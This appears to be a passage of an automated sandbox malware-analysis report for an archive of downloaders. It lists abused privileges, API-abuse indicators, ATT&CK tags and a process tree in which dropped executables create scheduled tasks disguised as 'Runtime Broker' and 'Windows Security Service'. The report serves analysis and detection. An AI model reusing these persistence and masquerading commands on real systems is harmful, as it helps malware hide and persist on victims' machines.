Token: SeDebugPrivilege	4352	4363463463464363463463463.exe
Token: SeDebugPrivilege	5040	Runtime Broker.exe
Token: SeDebugPrivilege	4168	seksiak.exe
Token: SeDebugPrivilege	1880	output.exe
Token: SeDebugPrivilege	5320	saloader.exe
Token: SeDebugPrivilege	3452	Loader.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeIncreaseQuotaPrivilege	3444	powershell.exe
Token: SeSecurityPrivilege	3444	powershell.exe
Token: SeTakeOwnershipPrivilege	3444	powershell.exe
Token: SeLoadDriverPrivilege	3444	powershell.exe
Token: SeSystemProfilePrivilege	3444	powershell.exe
Token: SeSystemtimePrivilege	3444	powershell.exe
Token: SeProfSingleProcessPrivilege	3444	powershell.exe
Token: SeIncBasePriorityPrivilege	3444	powershell.exe
Token: SeCreatePagefilePrivilege	3444	powershell.exe
Token: SeBackupPrivilege	3444	powershell.exe
Token: SeRestorePrivilege	3444	powershell.exe
Token: SeShutdownPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeSystemEnvironmentPrivilege	3444	powershell.exe
Token: SeRemoteShutdownPrivilege	3444	powershell.exe
Token: SeUndockPrivilege	3444	powershell.exe
Token: SeManageVolumePrivilege	3444	powershell.exe
Token: 33	3444	powershell.exe
Token: 34	3444	powershell.exe
Token: 35	3444	powershell.exe
Token: 36	3444	powershell.exe
Token: SeDebugPrivilege	1732	Tutorial.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	2564	aa.exe
Token: SeDebugPrivilege	2028	aidans.dont.run.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2636	7zFM.exe
2636	7zFM.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
2636	7zFM.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
1428	taskmgr.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
1428	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
1428	taskmgr.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe
1428	taskmgr.exe

Suspicious use of SetWindowsHookEx 51 IoCs

pid	Process
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5756	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
5224	firefox.exe
3260	Autoruns64.exe
3260	Autoruns64.exe
2816	procexp64.exe
4832	nobody.exe
2512	atat.exe
4680	vidar.exe
3700	boot.exe
5476	wget.exe
2420	firefox.exe
6128	wget.exe
6544	Client.exe
6184	AUTOKEY.exe
6184	AUTOKEY.exe
6184	AUTOKEY.exe
6016	wget.exe
4532	wget.exe
6632	run.exe
7076	run2.exe
1164	wget.exe
2420	firefox.exe
2420	firefox.exe
2420	firefox.exe
6644	wallx.exe
6744	wget.exe
2420	firefox.exe
2420	firefox.exe
2420	firefox.exe
4912	wget.exe
1856	wget.exe
7136	wget.exe
5404	FixCSM.exe
6168	ApertureLab.exe
1228	client32.exe
6828	newtpp.exe
2420	firefox.exe
2420	firefox.exe
2420	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 3448 wrote to memory of 5756	3448	firefox.exe	90
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 3004	5756	firefox.exe	91
PID 5756 wrote to memory of 5572	5756	firefox.exe	92
PID 5756 wrote to memory of 5572	5756	firefox.exe	92
PID 5756 wrote to memory of 5572	5756	firefox.exe	92
PID 5756 wrote to memory of 5572	5756	firefox.exe	92
PID 5756 wrote to memory of 5572	5756	firefox.exe	92
PID 5756 wrote to memory of 5572	5756	firefox.exe	92
PID 5756 wrote to memory of 5572	5756	firefox.exe	92
PID 5756 wrote to memory of 5572	5756	firefox.exe	92

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4116	attrib.exe
6804	attrib.exe
552	attrib.exe
3136	attrib.exe
7136	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3636
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2636
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Sets desktop wallpaper using registry
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:5756
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58d1e5dc-77a4-466b-a74d-58a47a4c9973} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" gpu
      4⤵
      PID:3004
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2424 -parentBuildID 20240401114208 -prefsHandle 2416 -prefMapHandle 2404 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b448eed6-00e8-4e8c-bedc-ef86c898cb8e} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" socket
      4⤵
      Checks processor information in registry
      PID:5572
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1196 -childID 1 -isForBrowser -prefsHandle 3168 -prefMapHandle 3200 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bc90195-2331-4ee1-9c1e-ad5d4fbeda2b} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" tab
      4⤵
      PID:5020
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3040 -childID 2 -isForBrowser -prefsHandle 3496 -prefMapHandle 3504 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83dc790e-344a-4383-8324-051dbb1ad771} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" tab
      4⤵
      PID:3836
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4776 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4812 -prefMapHandle 4808 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {662941cf-ee5b-4bf4-a302-0560b971cf8f} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" utility
      4⤵
      Checks processor information in registry
      PID:3456
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5328 -childID 3 -isForBrowser -prefsHandle 5344 -prefMapHandle 5336 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f639901-11a9-479a-bf57-8348a8bcf090} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" tab
      4⤵
      PID:3764
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5448 -childID 4 -isForBrowser -prefsHandle 5456 -prefMapHandle 5460 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {410d511d-a429-4102-a8a0-9b3c49c61d5a} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" tab
      4⤵
      PID:6028
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5680 -childID 5 -isForBrowser -prefsHandle 5628 -prefMapHandle 5432 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {548b1246-d941-4026-8285-cb2f47739e3c} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" tab
      4⤵
      PID:2292
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3692 -childID 6 -isForBrowser -prefsHandle 6108 -prefMapHandle 6096 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae9338d5-821c-44c0-96af-0b7ced3e6049} 5756 "\\.\pipe\gecko-crash-server-pipe.5756" tab
      4⤵
      PID:6020
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1428
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5252
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:5224
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1856 -prefMapHandle 1848 -prefsLen 28350 -prefMapSize 244930 -appDir "C:\Program Files\Mozilla Firefox\browser" - {861cf94a-98a5-488f-b0fd-1a61fa502a0f} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" gpu
      4⤵
      PID:4868
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20240401114208 -prefsHandle 2276 -prefMapHandle 2264 -prefsLen 28350 -prefMapSize 244930 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6439bcfa-ef8b-4aa3-ac03-39537b54b28b} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" socket
      4⤵
      Checks processor information in registry
      PID:5328
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3256 -childID 1 -isForBrowser -prefsHandle 3096 -prefMapHandle 3260 -prefsLen 28849 -prefMapSize 244930 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63579451-132d-42b2-9790-df7aa8849012} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" tab
      4⤵
      PID:5972
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3920 -childID 2 -isForBrowser -prefsHandle 3128 -prefMapHandle 3152 -prefsLen 34082 -prefMapSize 244930 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a26307dd-c52c-46fc-936a-3789fae0c517} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" tab
      4⤵
      PID:5256
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4488 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4636 -prefMapHandle 4616 -prefsLen 34136 -prefMapSize 244930 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c689b14f-6f1e-4714-bc14-becdd8f312ad} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" utility
      4⤵
      Checks processor information in registry
      PID:4004
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5128 -childID 3 -isForBrowser -prefsHandle 5188 -prefMapHandle 5176 -prefsLen 27767 -prefMapSize 244930 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c49e14b9-3ba8-4d43-9f21-a4973fdb23dc} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" tab
      4⤵
      PID:4588
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 4 -isForBrowser -prefsHandle 5240 -prefMapHandle 5344 -prefsLen 27767 -prefMapSize 244930 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca91be31-cc51-42b6-9f1e-9cfd32a38b68} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" tab
      4⤵
      PID:4784
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5576 -childID 5 -isForBrowser -prefsHandle 5584 -prefMapHandle 5592 -prefsLen 27767 -prefMapSize 244930 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {873b1933-63e1-4228-bfbd-d794db418362} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" tab
      4⤵
      PID:4684
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6000 -childID 6 -isForBrowser -prefsHandle 6020 -prefMapHandle 6016 -prefsLen 27846 -prefMapSize 244930 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fd23c88-c4e0-4f53-9103-d1d862cd24d7} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" tab
      4⤵
      PID:1988
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5256 -childID 7 -isForBrowser -prefsHandle 5356 -prefMapHandle 5332 -prefsLen 27846 -prefMapSize 244930 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6388e55c-ce1e-4060-ba32-f3beccfe22a8} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" tab
      4⤵
      PID:5788
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5364 -childID 8 -isForBrowser -prefsHandle 6212 -prefMapHandle 6204 -prefsLen 27846 -prefMapSize 244930 -jsInitHandle 1324 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec94390c-711d-411c-94ab-431d233019e2} 5224 "\\.\pipe\gecko-crash-server-pipe.5224" tab
      4⤵
      PID:3508
- C:\Program Files (x86)\sysinternals\Autoruns64.exe
  "C:\Program Files (x86)\sysinternals\Autoruns64.exe"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3260
- C:\Program Files (x86)\sysinternals\procexp64.exe
  "C:\Program Files (x86)\sysinternals\procexp64.exe"
  2⤵
  - Drops file in Drivers directory
  - Event Triggered Execution: Image File Execution Options Injection
  - Sets service image path in registry
  - Enumerates connected drives
  - Checks processor information in registry
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: LoadsDriver
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/about/terms-of-service
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:3176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x144,0x148,0x120,0x14c,0x7ffa70bc46f8,0x7ffa70bc4708,0x7ffa70bc4718
    3⤵
    PID:5316
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,6806564153132571235,17106892243696908310,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
    3⤵
    PID:2440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,6806564153132571235,17106892243696908310,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
    3⤵
    PID:3600
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,6806564153132571235,17106892243696908310,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
    3⤵
    PID:3264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6806564153132571235,17106892243696908310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
    3⤵
    PID:5756
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6806564153132571235,17106892243696908310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
    3⤵
    PID:564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6806564153132571235,17106892243696908310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
    3⤵
    PID:1052
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5852
- - C:\Users\Admin\Desktop\a\SGVP%20Client%20Users.exe
    "C:\Users\Admin\Desktop\a\SGVP%20Client%20Users.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5772
- - C:\Users\Admin\Desktop\a\Registry.exe
    "C:\Users\Admin\Desktop\a\Registry.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1236
  - - C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5040
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5200
- - C:\Users\Admin\Desktop\a\seksiak.exe
    "C:\Users\Admin\Desktop\a\seksiak.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4168
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4264
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZjR8cBUtfSM.bat" "
      4⤵
      PID:2636
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2244
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2568
    - - C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5172
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Go9se8cYbxLI.bat" "
        6⤵
        
        PID:3588
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:5456
        
        C:\Windows\system32\PING.EXE
        
